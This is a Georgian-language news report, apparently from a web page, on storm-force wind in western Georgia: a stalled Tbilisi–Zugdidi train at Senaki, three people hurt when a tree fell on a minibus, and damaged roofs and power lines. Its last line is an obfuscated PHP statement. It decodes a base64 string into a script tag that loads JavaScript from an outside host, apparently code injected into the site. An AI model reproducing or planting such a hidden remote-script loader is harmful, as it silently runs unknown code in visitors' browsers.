celsiusi
ავერსი საქკაბელი
სენაკში, რკინიგზის სადგურთან, თბილისი-ზუგდიდის მატარებელი გაჩერებულია. როგორც საინფორმაციო სააგენტო BUSINESS TIME-ს ადგილობრივებმა განუცხადეს ძლიერი ქარის გამო სადენები დაზიანდა და მატარებელი დაგეგმილი რეისის შესრულებას ვეღარ შეძლებს. 
არსებული ინფორმაციით, პრობლემის აღმოსაფხვრელად სამტრედიიდან სპეციალური ჯგუფი მოდის, რათა ხაზები შეაკეთონ. ამასთან, ქარი სამუშაოების შესრულებას აფერხებს.
რაც შეეხებათ მგზავრებს, ისინი მიკროავტობუსებსა და სხვა ტრანსპორტში გადაანაწილეს.
ასევე, სენაკში, რუსთაველის ქუჩაზე სამგზავრო მიკროავტობუსს ხე დაეცა. დაშავდა 3 ადამიანი. ისინი სენაკის საავადმყოფოში გადაიყვანეს. ერთერთის მდგომარეობა ექიმების თქმით შედარებით მძიმეა.
შემთხვევის ადგილას სამართალდამცველები იმყოფებიან და შექმნილია საგანგებო შტაბი, რადგან დღის მეორე ნახევარში ქარის გაძლიერებას ელოდებიან.
ქუთაისში კი, ცხინვალის ქუჩაზე, ცოტა ხნის წინ ძლიერმა ქარმა ხე მოგლიჯა. დაზიანებულია საცხოვრებელი შენობის სახურავი. ამავე ქუჩაზე პერიმეტრი ჩაიხერგა, რის გამოც დროებით შეჩერებულია საავტომობილო მოძრაობაც. 
„რამდენიმე მუნიციპალიტეტში ქარმა ასევე დააზიანა ელექტროგადამცემი ხაზები, თუმცა, ყველა პრობლემურ ადგილზე „ენერგო პრო ჯორჯიას“ ბრიგადები მუშაობენ და აბონენტებს ელექტრო ენერგიის მიწოდება ეტაპობრივად აღუდგებათ.
სტიქიამ ზუგდიდის, ფოთისა და სენაკის მუნიციპალიტეტებში ასევე დააზიანა რამდენიმე კერძო სახლის სახურავის ნაწილიც. მუნიციპალიტეტების ზარალის დამთვლელი კომისიების მიერ მოხდება ზარალის დათვლა და შესაბამისი რეაგირება.
ადგილზე ვითარებას მოადგილეებთან ერთად ეცნობა სამეგრელო-ზემო სვანეთის სახელმწიფო რწმუნებული გიორგი გუგუჩია. ყველა შესაბამისი მუნიციპალური სამსახური მუშაობს საგანგებო რეჟიმში“, - ნათქვამია სამეგრელო-ზემო სვანეთის სახელმწიფო რწმუნებულის ადმინისტრაციის მიერ გავრცელებულ ინფორმაციაში.
შეგახსენებთ, დასავლეთ საქართველოში უკვე 2 დღეა ძლიერი ქარია. 

347
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");